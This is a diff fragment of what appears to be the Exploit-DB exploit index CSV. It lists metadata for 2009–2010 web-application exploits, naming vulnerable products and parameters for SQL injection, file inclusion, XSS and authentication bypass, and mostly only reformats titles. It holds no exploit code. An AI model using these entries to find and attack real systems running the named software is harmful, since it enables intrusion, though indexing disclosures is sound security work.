+10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,php,webapps,0 10794,platforms/asp/webapps/10794.txt,"Web Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10796,platforms/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 @@ -22881,7 +22882,7 @@ id,file,description,date,author,platform,type,port 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - Cross-Site Scripting",2009-12-30,MaXe,php,webapps,0 10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - 'detail.php' SQL Injection",2009-12-30,Palyo34,php,webapps,0 10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio - Local File Inclusion",2009-12-30,bonobug,php,webapps,0 -10809,platforms/php/webapps/10809.txt,"I-Escorts Directory - 'country_escorts.php country_id' SQL Injection",2009-12-30,R3d-D3V!L,php,webapps,0 +10809,platforms/php/webapps/10809.txt,"I-Escorts Directory - 'country_escorts.php?country_id' SQL Injection",2009-12-30,R3d-D3V!L,php,webapps,0 10810,platforms/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info",2009-12-30,indoushka,php,webapps,0 10811,platforms/php/webapps/10811.txt,"Joomla! Component com_intuit - Apache Directory listing Download",2009-12-30,indoushka,php,webapps,0 10812,platforms/php/webapps/10812.txt,"WHOISCART - Scripting",2009-12-30,HAQIQ20,php,webapps,0 @@ -22894,15 +22895,15 @@ id,file,description,date,author,platform,type,port 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10830,platforms/php/webapps/10830.txt,"Azadi Network - (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10830,platforms/php/webapps/10830.txt,"Azadi Network - 'page' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0 10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0 -10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10833,platforms/php/webapps/10833.txt,"Classifieds Script - 'type' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10838,platforms/php/webapps/10838.txt,"list Web - 'addlink.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip - 'store_info.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10838,platforms/php/webapps/10838.txt,"list Web - 'addlink.php?id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip - 'store_info.php?id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10841,platforms/php/webapps/10841.pl,"pL-PHP Beta 0.9 - Local File Inclusion",2009-12-31,cr4wl3r,php,webapps,0 10844,platforms/php/webapps/10844.txt,"Joomla! Component com_portfol - SQL Injection",2009-12-31,"wlhaan hacker",php,webapps,0 10845,platforms/php/webapps/10845.txt,"fileNice PHP file browser - Local/Remote File Inclusion",2009-12-31,e.wiZz,php,webapps,0 @@ -22910,7 +22911,7 @@ id,file,description,date,author,platform,type,port 10847,platforms/php/webapps/10847.txt,"Joomla! Component com_mdigg - SQL Injection",2009-12-31,"wlhaan hacker",php,webapps,0 10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0 10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0 -10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0 +10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - 'lng' Local File Inclusion",2009-12-31,cOndemned,php,webapps,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",php,webapps,0 10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 @@ -22953,7 +22954,7 @@ id,file,description,date,author,platform,type,port 10950,platforms/php/webapps/10950.txt,"Joomla! Component com_tpjobs - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10952,platforms/php/webapps/10952.txt,"Joomla! Component com_alfresco - SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10953,platforms/php/webapps/10953.txt,"Joomla! Component com_hotbrackets - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 -10955,platforms/asp/webapps/10955.txt,"MasterWeb Script 1.0 - (details&newsID) SQL Injection",2010-01-03,Red-D3v1L,asp,webapps,0 +10955,platforms/asp/webapps/10955.txt,"MasterWeb Script 1.0 - 'details&newsID' SQL Injection",2010-01-03,Red-D3v1L,asp,webapps,0 10962,platforms/php/webapps/10962.txt,"Live TV Script - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10964,platforms/php/webapps/10964.txt,"Joomla! Component Bridge of Hope Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10965,platforms/php/webapps/10965.txt,"Joomla! Component com_doqment - 'cid' SQL Injection",2010-01-03,Gamoscu,php,webapps,0 @@ -22992,7 +22993,7 @@ id,file,description,date,author,platform,type,port 11026,platforms/php/webapps/11026.php,"com_jembed - 'catid' Blind SQL Injection",2010-01-06,FL0RiX,php,webapps,0 11028,platforms/php/webapps/11028.txt,"Docebo 3.6.0.2 (stable) - Local File Inclusion",2010-01-06,"Zer0 Thunder",php,webapps,0 11030,platforms/hardware/webapps/11030.txt,"D-Link DKVM-IP8 - Cross-Site Scripting",2010-01-06,POPCORN,hardware,webapps,0 -11031,platforms/php/webapps/11031.txt,"Milonic News - (viewnews) SQL Injection",2010-01-06,Err0R,php,webapps,0 +11031,platforms/php/webapps/11031.txt,"Milonic News - 'viewnews' SQL Injection",2010-01-06,Err0R,php,webapps,0 11033,platforms/php/webapps/11033.txt,"Joomla! Component com_kk - Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 11035,platforms/php/webapps/11035.txt,"Joomla! Component com_king - Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 11036,platforms/php/webapps/11036.txt,"Roundcube Webmail - Multiple Vulnerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 @@ -23003,7 +23004,7 @@ id,file,description,date,author,platform,type,port 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Arbitrary File Upload",2010-01-07,Yozgat.Us,php,webapps,0 11060,platforms/php/webapps/11060.txt,"Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla! Component Regional Booking - 'id' Blind SQL Injection",2010-01-07,"Hussin X",php,webapps,0 -11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 - (print_view) Blind SQL Injection",2010-01-08,Red-D3v1L,php,webapps,0 +11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,php,webapps,0 11068,platforms/php/webapps/11068.txt,"Joomla! Component com_ksadvertiser - SQL Injection",2010-01-08,FL0RiX,php,webapps,0 11069,platforms/php/webapps/11069.txt,"DELTAScripts PHPLinks - 'catid' SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 @@ -23045,7 +23046,7 @@ id,file,description,date,author,platform,type,port 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusions",2010-01-16,cr4wl3r,php,webapps,0 11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0 11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0 -11159,platforms/php/webapps/11159.txt,"DasForum - (layout) Local File Inclusion",2010-01-16,cr4wl3r,php,webapps,0 +11159,platforms/php/webapps/11159.txt,"DasForum - 'layout' Local File Inclusion",2010-01-16,cr4wl3r,php,webapps,0 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11163,platforms/php/webapps/11163.txt,"ITechSctipts Alibaba Clone - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11164,platforms/php/webapps/11164.txt,"Ebay Clone from clone2009 - SQL Injection",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 @@ -23066,7 +23067,7 @@ id,file,description,date,author,platform,type,port 11212,platforms/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla! Component com_book - SQL Injection",2010-01-21,Evil-Cod3r,php,webapps,0 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery",2010-01-21,cp77fk4r,windows,webapps,0 -11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection",2010-01-21,"BorN To K!LL",php,webapps,0 +11216,platforms/php/webapps/11216.txt,"Blog System 1.x - 'note' SQL Injection",2010-01-21,"BorN To K!LL",php,webapps,0 11218,platforms/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 11222,platforms/php/webapps/11222.txt,"Joomla! Component com_gameserver - SQL Injection",2010-01-22,B-HUNT3|2,php,webapps,0 11223,platforms/php/webapps/11223.txt,"Joomla! Component com_avosbillets - SQL Injection",2010-01-22,snakespc,php,webapps,0 @@ -23118,7 +23119,7 @@ id,file,description,date,author,platform,type,port 11311,platforms/php/webapps/11311.txt,"Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)",2010-02-01,The.Morpheus,php,webapps,0 11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,php,webapps,0 11318,platforms/php/webapps/11318.txt,"Dlili Script - SQL Injection",2010-02-02,Dr.DaShEr,php,webapps,0 -11319,platforms/php/webapps/11319.txt,"MYRE Classified - (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0 +11319,platforms/php/webapps/11319.txt,"MYRE Classified - 'cat' SQL Injection",2010-02-02,kaMtiEz,php,webapps,0 11321,platforms/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps,0 11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)",2010-02-03,"Milos Zivanovic",php,webapps,0 11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 @@ -23138,7 +23139,7 @@ id,file,description,date,author,platform,type,port 11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0 11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 -11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0 +11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - 'articlemodule' SQL Injection",2010-02-07,"T u R c O",php,webapps,0 11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps,0 11352,platforms/php/webapps/11352.txt,"Joomla! Component com_productbook - SQL Injection",2010-02-07,snakespc,php,webapps,0 11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0 @@ -23234,7 +23235,7 @@ id,file,description,date,author,platform,type,port 11502,platforms/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps,0 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0 -11507,platforms/php/webapps/11507.txt,"WSC CMS - (Bypass) SQL Injection",2010-02-19,Phenom,php,webapps,0 +11507,platforms/php/webapps/11507.txt,"WSC CMS - (Authentication Bypass) SQL Injection",2010-02-19,Phenom,php,webapps,0 11508,platforms/php/webapps/11508.txt,"Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection",2010-02-19,NorSlacker,php,webapps,0 11509,platforms/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",php,webapps,0 11511,platforms/php/webapps/11511.txt,"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,php,webapps,0 @@ -23307,7 +23308,7 @@ id,file,description,date,author,platform,type,port 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal - 'index.php' SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi (DosyaYukle Scripti) 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps,0 11621,platforms/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,cr4wl3r,php,webapps,0 -11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0 +11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - 'showplugs.php' SQL Injection",2010-03-03,"Easy Laster",php,webapps,0 11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0 11625,platforms/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0 11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps,0 @@ -23315,13 +23316,13 @@ id,file,description,date,author,platform,type,port 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 11636,platforms/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0 -11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 -11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0 +11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php?id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 +11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - 'linkid' Blind SQL Injection",2010-03-05,JosS,php,webapps,0 11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 11643,platforms/php/webapps/11643.txt,"dev4u CMS (Personenseiten) - 'go_target.php' SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 -11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 -11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 +11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php?id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 +11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php?SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,cr4wl3r,php,webapps,0 11657,platforms/php/webapps/11657.txt,"Chaton 1.5.2 - Local File Inclusion",2010-03-08,cr4wl3r,php,webapps,0 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0 @@ -23341,7 +23342,7 @@ id,file,description,date,author,platform,type,port 11686,platforms/php/webapps/11686.txt,"ANE CMD CRSF - Add Admin",2010-03-11,"pratul agrawal",php,webapps,0 11687,platforms/php/webapps/11687.txt,"Ane CMS 1 - Persistent Cross-Site Scripting",2010-03-11,"pratul agrawal",php,webapps,0 11688,platforms/php/webapps/11688.txt,"Joomla! Component com_blog - SQL Injection",2010-03-11,"DevilZ TM",php,webapps,0 -11689,platforms/php/webapps/11689.txt,"Eros Erotik Webkatalog - start.php (rubrik&id) SQL Injection",2010-03-11,"Easy Laster",php,webapps,0 +11689,platforms/php/webapps/11689.txt,"Eros Erotik Webkatalog - 'start.php?id' SQL Injection",2010-03-11,"Easy Laster",php,webapps,0 11691,platforms/php/webapps/11691.txt,"Joomla! Component com_products - 'intCategoryId' SQL Injection",2010-03-11,N2n-Hacker,php,webapps,0 11692,platforms/php/webapps/11692.txt,"Joomla! Component com_gigfe - SQL Injection",2010-03-11,"DevilZ TM",php,webapps,0 11693,platforms/php/webapps/11693.txt,"Joomla! Component com_color - SQL Injection",2010-03-11,"DevilZ TM",php,webapps,0 @@ -23350,7 +23351,7 @@ id,file,description,date,author,platform,type,port 11698,platforms/php/webapps/11698.txt,"Joomla! Component com_leader - SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 11699,platforms/php/webapps/11699.txt,"Joomla! Component com_family - SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - 'topic.php' SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 -11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 +11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - 'edit' SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11704,platforms/php/webapps/11704.txt,"dreamlive Auktionshaus script - 'news.php?id' SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 11707,platforms/php/webapps/11707.txt,"Joomla! Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 11708,platforms/php/webapps/11708.txt,"Joomla! Component com_sbsfile - Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps,0 @@ -23386,7 +23387,7 @@ id,file,description,date,author,platform,type,port 11747,platforms/php/webapps/11747.txt,"CH-CMS.ch 2 - Arbitrary File Upload",2010-03-15,EL-KAHINA,php,webapps,0 11748,platforms/php/webapps/11748.txt,"Interspire SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,php,webapps,0 11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload",2010-03-15,indoushka,php,webapps,0 -11752,platforms/php/webapps/11752.txt,"Joomla! Component com_org - SQL Injection (letter Parameter)",2010-03-15,kazuya,php,webapps,0 +11752,platforms/php/webapps/11752.txt,"Joomla! Component com_org - 'letter' SQL Injection",2010-03-15,kazuya,php,webapps,0 11754,platforms/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0 11755,platforms/php/webapps/11755.txt,"osDate 2.1.9 - Remote File Inclusion",2010-03-15,NoGe,php,webapps,0 11756,platforms/php/webapps/11756.txt,"Joomla! Component com_linkr - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -23394,7 +23395,7 @@ id,file,description,date,author,platform,type,port 11758,platforms/php/webapps/11758.txt,"Joomla! Component com_ganalytics - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 11759,platforms/php/webapps/11759.txt,"Joomla! Component com_sectionex - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 11760,platforms/php/webapps/11760.txt,"Joomla! Component com_rokdownloads - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 -11761,platforms/php/webapps/11761.txt,"Preisschlacht 4.0 Flash System - SQL Injection (seite&aid) index.php",2010-03-15,"Easy Laster",php,webapps,0 +11761,platforms/php/webapps/11761.txt,"Preisschlacht 4.0 Flash System - 'index.php?aid' SQL Injection",2010-03-15,"Easy Laster",php,webapps,0 11766,platforms/php/webapps/11766.txt,"Joomla! Component com_bidding - SQL Injection",2010-03-15,N2n-Hacker,php,webapps,0 11767,platforms/php/webapps/11767.txt,"Joomla! Component com_route - SQL Injection",2010-03-15,N2n-Hacker,php,webapps,0 11768,platforms/php/webapps/11768.txt,"Newbie CMS - File Disclosure",2010-03-15,JIKO,php,webapps,0 @@ -23409,7 +23410,7 @@ id,file,description,date,author,platform,type,port 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",php,webapps,0 11781,platforms/php/webapps/11781.html,"ChillyCMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",php,webapps,0 11782,platforms/php/webapps/11782.txt,"Joomla! Component com_include - SQL Injection",2010-03-17,"DevilZ TM",php,webapps,0 -11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0 +11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - 'index.php?aid' SQL Injection",2010-03-17,"Easy Laster",php,webapps,0 11784,platforms/php/webapps/11784.txt,"PostNuke FormExpress Module - Blind SQL Injection",2010-03-17,"Ali Abbasi",php,webapps,0 11785,platforms/php/webapps/11785.txt,"Joomla! Component com_ckforms - Multiple Vulnerabilities",2010-03-17,ALTBTA,php,webapps,0 11788,platforms/php/webapps/11788.txt,"PHP-Nuke - ratedownload SQL Injection",2010-03-17,ITSecTeam,php,webapps,0 @@ -23423,10 +23424,10 @@ id,file,description,date,author,platform,type,port 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusions",2010-03-18,cr4wl3r,php,webapps,0 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps,0 -11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0 +11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System - 'index.php?aid' SQL Injection",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 -11815,platforms/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 +11815,platforms/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - 'pkg' SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - 'auktion.php?id_auk' Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps,0 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - 'ts_other.php' SQL Injection",2010-03-21,"Easy Laster",php,webapps,0 @@ -23545,7 +23546,7 @@ id,file,description,date,author,platform,type,port 12015,platforms/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 -12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0 +12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - 'popup.php' / 'counter.php' Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion",2010-04-02,cr4wl3r,php,webapps,0 12021,platforms/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Cross-Site Request Forgery (Admin)",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Cross-Site Request Forgery (Edit Main Settings)",2010-04-02,"Jelmer de Hen",php,webapps,0 @@ -23638,7 +23639,7 @@ id,file,description,date,author,platform,type,port 12153,platforms/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0 12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0 -12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0 +12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - 'match' SQL Injection",2010-04-11,"Easy Laster",php,webapps,0 12159,platforms/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 12162,platforms/php/webapps/12162.txt,"Joomla! Component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 @@ -23664,15 +23665,15 @@ id,file,description,date,author,platform,type,port 12183,platforms/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12184,platforms/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12185,platforms/php/webapps/12185.txt,"Joomla! Component FLEXIcontent 1.5 - Local File Inclusion",2010-04-12,eidelweiss,php,webapps,0 -12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-12,cr4wl3r,php,webapps,0 +12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - Local File Inclusion / Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0 12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0 12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple 